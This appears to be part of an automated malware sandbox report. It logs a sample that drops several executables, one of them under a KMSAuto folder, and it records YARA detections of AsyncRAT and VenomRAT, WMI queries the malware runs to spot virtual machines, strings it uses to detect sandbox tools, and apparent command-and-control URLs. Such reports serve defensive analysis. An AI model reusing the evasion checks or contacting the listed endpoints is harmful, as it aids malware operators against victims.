Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KMSAuto\accc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPED

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: relog.exe	Binary or memory string: PROCESSHACKER.EXE
Source: relog.exe, 00000035.00000002.2761180327.00007FF7AE4A6000.00000002.00000001.01000000.0000001E.sdmp	Binary or memory string: NUCLEARBOTEXPLORER.EXE\ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{%08LX%04LX%LU}.EXEMOZILLA 5/0.LNK\WINSERVER\*....EXE\SERVICE_SERVICE_HTTPS://AUTH.XN--CONBASE-SFB.XYZ/EVENT.PHPHTTPS://EXCHANGER.INK/EVENT.PHPSYSTEMUPDATE.EXETASKMGR.EXEPROCESSHACKER.EXEFIREFOX.EXECHROME.EXECHROME.EXEMSEDGE.EXEMSEDGE.EXEZBIUNKNOWNRELOG.EXEBAD CASTXK
Source: xj40xovMsm.exe, 00000000.00000002.1763287432.0000020234D10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXEPROCESSHACKER.EXEFIREFOX.EXECHROME.E
Source: xj40xovMsm.exe, Service_{B955B2CC07A01546086603}.exe.25.dr, zbi[1].exe.0.dr, Service_Microsoft.exe.0.dr, zbi[1].exe.25.dr, Service_Skype.exe.0.dr, Service_Mozilla.exe.0.dr, Service_Adobe.exe.0.dr, {B955B2CC07A01546086603}.exe.0.dr, SystemUpdate.exe.0.dr, Service_com.adobe.dunamis.exe.0.dr, psvhost.exe.0.dr	Binary or memory string: NUCLEARBOTEXPLORER.EXE\ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{%08LX%04LX%LU}.EXEMOZILLA 5/0.LNK\WINSERVER\*....EXE\SERVICE_SERVICE_HTTPS://AUTH.XN--CONBASE-SFB.XYZ/EVENT.PHPHTTPS://EXCHANGER.INK/EVENT.PHPSYSTEMUPDATE.EXETASKMGR.EXEPROCESSHACKER.EXEFIREFOX.EXECHROME.EXECHROME.EXEMSEDGE.EXEMSEDGE.EXEZBIUNKNOWNRELOG.EXEBAD CASTX
Source: xj40xovMsm.exe, 00000019.00000002.2618262946.00000229BA940000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEMUPDATE.EXETASKMGR.EXEPROCESSHACKER.EXEFIREFOX.EXECHROME.EXECHROME.EXEMSEDGE.EXEMSEDGE.EXEZBIUNKNOWNRELOG.EXEBAD CASTX
Source: 4336.tmp.Server.exe, 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, 5087.tmp.update.exe, 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, 5087.tmp.update.exe, 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, 5087.tmp.update.exe, 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe.2.dr, svchost.exe.14.dr, 5087.tmp.update.exe.2.dr, 4336.tmp.Server.exe.2.dr, 53A5.tmp.update.exe.2.dr	Binary or memory string: SBIEDLL.DLL
Source: relog.exe, 0000002F.00000002.2609836968.00007FF6AA356000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: NUCLEARBOTEXPLORER.EXE\ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{%08LX%04LX%LU}.EXEMOZILLA 5/0.LNK\WINSERVER\*....EXE\SERVICE_SERVICE_HTTPS://AUTH.XN--CONBASE-SFB.XYZ/EVENT.PHPHTTPS://EXCHANGER.INK/EVENT.PHPSYSTEMUPDATE.EXETASKMGR.EXEPROCESSHACKER.EXEFIREFOX.EXECHROME.EXECHROME.EXEMSEDGE.EXEMSEDGE.EXEZBIUNKNOWNRELOG.EXEBAD CASTX6
Source: 5E16.tmp.aaa.exe, 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, 5E16.tmp.aaa.exe.2.dr	Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Memory allocated: 16A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Memory allocated: 1B2C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Memory allocated: 860000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Memory allocated: 24A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Memory allocated: 44A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Memory allocated: C60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Memory allocated: 2900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Memory allocated: 4900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Memory allocated: 1130000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch
Source: C:\ProgramData\KMSAuto\accc.exe	Memory allocated: EA0000 memory reserve \| memory write watch
Source: C:\ProgramData\KMSAuto\accc.exe	Memory allocated: 1AA10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Memory allocated: 10F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Memory allocated: 2930000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Memory allocated: 2830000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Memory allocated: 730000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Memory allocated: 2260000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Memory allocated: 8D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Memory allocated: B60000 memory reserve \| memory write watch
